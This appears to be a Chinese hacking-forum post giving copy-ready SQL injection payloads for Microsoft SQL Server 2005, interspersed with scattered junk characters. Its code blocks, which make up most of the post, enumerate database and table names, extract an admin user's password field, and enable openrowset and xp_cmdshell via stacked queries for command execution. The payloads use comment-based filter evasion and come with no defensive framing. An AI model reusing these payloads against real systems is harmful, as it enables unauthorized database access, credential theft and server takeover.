MSsql2005注入语句

admin

8 V4 o2 C" R) P1 N0 W
: r: i3 j4 r: F% T4 R0 k( E[Copy to clipboard]CODE:
0 H! X4 }( w8 |1 ~% a4 s0 z/ O# n/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
# c$ r: Z/ |5 l6 P& G
( G/ ~4 z1 g8 \, h0 _& j! _1 r爆表语句,somedb部份是所要列的数据库，红色数字1累加
) ~! m* ~9 y4 u
0 h! {( I5 A( ^5 s% t
0 {* k8 R  J0 u. t* N2 z[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

爆字段语句，爆表admin里user='icerover'的密码段
7 o5 ]: L5 T1 x

[Copy to clipboard]CODE:
- M, {) @- e8 d, \4 U  A**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
8 D7 J, f  l$ A7 h
! ]% [2 M! A/ R, w" }4 imssql2005默认没有开xp_cmdshell的，openrowset也不能用
如果是sa权限，可以这样来开启
; g! {1 m: |! j5 T- O开启openrowset


( x* _. _! [$ i3 O+ @, F[Copy to clipboard]CODE:
+ h) o  O5 h) Z2 z% k0 l5 l- R1 t% M/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

1 @; j& r9 h* F( U7 V3 _开启xp_cmdshell


7 X8 C) }+ O/ K+ k[Copy to clipboard]CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

ok,over~~晚安
3 L% d2 \. A1 X1 M$ d8 x$ r2 u7 ]